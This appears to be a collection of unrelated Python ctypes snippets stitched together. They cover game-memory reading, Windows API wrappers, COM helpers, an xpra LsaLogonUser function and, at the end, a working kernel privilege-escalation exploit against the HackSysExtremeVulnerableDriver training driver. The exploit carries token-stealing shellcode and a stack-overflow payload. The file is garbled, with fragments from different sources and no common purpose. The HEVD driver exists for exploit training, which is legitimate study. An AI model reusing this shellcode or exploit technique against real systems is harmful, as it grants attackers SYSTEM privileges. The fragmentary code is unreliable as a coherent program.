def get_lives(handle): """Reads number of lives from program memory""" if DEBUG and DEBUG_MEMORY: print("get_lives") buffer = wtypes.LPVOID(0) buffer, bytes_read = read_memory(handle, LIVES_ADDR, buffer, sizeof(c_uint32)) return buffer.value
def get_score(handle): """Reads score from program memory""" if DEBUG and DEBUG_MEMORY: print("get_score") buffer = wtypes.LPVOID(0) buffer, bytes_read = read_memory(handle, SCORE_ADDR, buffer, sizeof(c_uint32)) return buffer.value
def changeProtect(): old_protection = w.DWORD(0) print({ "VirtualProtectEx": k32.VirtualProtectEx(processHandle, w.LPVOID(address), 1, 0x40, w.PDWORD(old_protection)), "last_error": k32.GetLastError() })
def StartThread(function): func = LPTHREAD_START_ROUTINE(function) threadID = wintypes.DWORD() handle = wintypes.HANDLE(windll.kernel32.CreateThread(None, 0, func, wintypes.LPVOID(0), 0, ctypes.byref(threadID))) if handle: windll.kernel32.WaitForSingleObject(handle, 1) return handle, threadID
def QueryInterface(self, riid): prototype = ctypes.WINFUNCTYPE(HRESULT, ctypes.POINTER(winapi.GUID), ctypes.POINTER(wintypes.LPVOID)) paramflags = ((_In_, 'riid'), (_Out_, 'ppvObject', ctypes.pointer(wintypes.LPVOID(None)))) _QueryInterface = prototype(IUnknown_QueryInterface_Idx, 'QueryInterface', paramflags) _QueryInterface.errcheck = winapi.RAISE_NON_ZERO_ERR return_ptr = _QueryInterface(self.this, ctypes.byref(riid)) return IUnknown(return_ptr.contents)
def SafeArrayAccessData(sa): prototype = ctypes.WINFUNCTYPE(HRESULT, ctypes.POINTER(SAFEARRAY), ctypes.POINTER(wintypes.LPVOID)) paramflags = ( (_In_, 'psa'), (_Out_, 'ppvData', ctypes.pointer(wintypes.LPVOID(None))), ) _SafeArrayAccessData = prototype(('SafeArrayAccessData', oleaut32), paramflags) _SafeArrayAccessData.errcheck = RAISE_NON_ZERO_ERR return_obj = _SafeArrayAccessData(sa) return return_obj.contents
def GetFileVersionInfo(path): if isinstance(path, unicode): GetFileVersionInfoSize = __GetFileVersionInfoSizeW _GetFileVersionInfo = __GetFileVersionInfoW VerQueryValue = __VerQueryValueW VerQueryValueSubBlock1 = unicode(r"\VarFileInfo\Translation") VerQueryValueSubBlock2 = unicode( r"\StringFileInfo\%04x%04x\FileVersion") _string_at = wstring_at else: GetFileVersionInfoSize = __GetFileVersionInfoSizeA _GetFileVersionInfo = __GetFileVersionInfoA VerQueryValue = __VerQueryValueA VerQueryValueSubBlock1 = br"\VarFileInfo\Translation" VerQueryValueSubBlock2 = br"\StringFileInfo\%04x%04x\FileVersion" _string_at = string_at size = GetFileVersionInfoSize(path, None) if not size: return None data = create_string_buffer(size) success = _GetFileVersionInfo(path, 0, size, data) assert success buffer = wintypes.LPVOID() length = wintypes.UINT() success = VerQueryValue(data, VerQueryValueSubBlock1, buffer, length) if not success: return None codepage = tuple(array.array("H", string_at(buffer.value, length.value))) success = VerQueryValue(data, VerQueryValueSubBlock2 % codepage, buffer, length) if not success: return None return _string_at(buffer.value, length.value - 1)
def lsa_logon_user(auth_info, local_groups=None, origin_name=py_origin_name, source_context=None, auth_package=None, logon_type=None, lsa_handle=None): from xpra.log import Logger log = Logger("win32") log("lsa_logon_user%s", (auth_info, local_groups, origin_name, source_context, auth_package, logon_type, lsa_handle)) if local_groups is None: plocal_groups = PTOKEN_GROUPS() else: plocal_groups = ctypes.byref(local_groups) if source_context is None: source_context = py_source_context if not isinstance(origin_name, bytes): origin_name = origin_name.encode('mbcs') buf = ctypes.create_string_buffer(origin_name) origin_name = STRING(len(origin_name), len(buf), buf) if auth_package is None: if isinstance(auth_info, MSV1_0_S4U_LOGON): auth_package = NEGOTIATE_PACKAGE_NAME elif isinstance(auth_info, KERB_S4U_LOGON): auth_package = MICROSOFT_KERBEROS_NAME else: auth_package = MSV1_0_PACKAGE_NAME if logon_type is None: if isinstance(auth_info, S4ULogon): logon_type = Batch else: logon_type = Interactive profile_buffer = wintypes.LPVOID() profile_buffer_length = wintypes.ULONG() profile = None logonid = LUID() htoken = HANDLE() quotas = QUOTA_LIMITS() substatus = NTSTATUS() deregister = False if lsa_handle is None: lsa_handle = lsa_connect_untrusted() deregister = True try: if isinstance(auth_package, (str, bytes)): auth_package = lsa_lookup_authentication_package( lsa_handle, auth_package) try: args = (lsa_handle, ctypes.byref(origin_name), logon_type, auth_package, ctypes.byref(auth_info), ctypes.sizeof(auth_info), plocal_groups, ctypes.byref(source_context), ctypes.byref(profile_buffer), ctypes.byref(profile_buffer_length), ctypes.byref(logonid), ctypes.byref(htoken), ctypes.byref(quotas), ctypes.byref(substatus)) log("LsaLogonUser%s", args) secur32.LsaLogonUser(*args) except WindowsError: #@UndefinedVariable if substatus.value: raise ctypes.WinError(substatus.to_error()) raise finally: if profile_buffer: address = profile_buffer.value buftype = PROFILE_BUFFER_TYPE.from_address(address).value if buftype == MsV1_0InteractiveLogon: profile = MSV1_0_INTERACTIVE_PROFILE.from_address_copy( address, profile_buffer_length.value) secur32.LsaFreeReturnBuffer(address) finally: if deregister: secur32.LsaDeregisterLogonProcess(lsa_handle) return LOGONINFO(htoken, logonid, profile, quotas)
FILE_SHARE_DELETE = 0x00000004 FILE_SHARE_READ = 0x00000001 FILE_SHARE_WRITE = 0x00000002 CREATE_NEW = 1 CREATE_ALWAYS = 2 OPEN_EXISTING = 3 OPEN_ALWAYS = 4 TRUNCATE_EXISTING = 5 shellcode="\x53\x56\x57\x60\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\xBA\x04\x00\x00\x00\x8B\x80\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x39\x90\xB4\x00\x00\x00\x75\xED\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\x61\x33\xC0\x83\xC4\x0C\x5D\xC2\x08\x00" IOCTL_STACK=0x222027 hDevice = ctypes.windll.kernel32.CreateFileA(r"\\.\HackSysExtremeVulnerableDriver",GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None ) print int(hDevice) buf = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(0x824),ctypes.c_int(0x3000),ctypes.c_int(0x40)) data= shellcode+ ((0x828 -len(shellcode)) * "A") + struct.pack("<L",int(buf))+struct.pack("<L",0x0BAD0B0B0 ) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(buf),data,ctypes.c_int(len(data))) bytes_returned = wintypes.DWORD(0) h=wintypes.HANDLE(hDevice) b=wintypes.LPVOID(buf) ctypes.windll.kernel32.DeviceIoControl(h,IOCTL_STACK, b, -1, None, 0, ctypes.pointer(bytes_returned),0) ctypes.windll.kernel32.CloseHandle(hDevice) os.system("calc.exe") raw_input()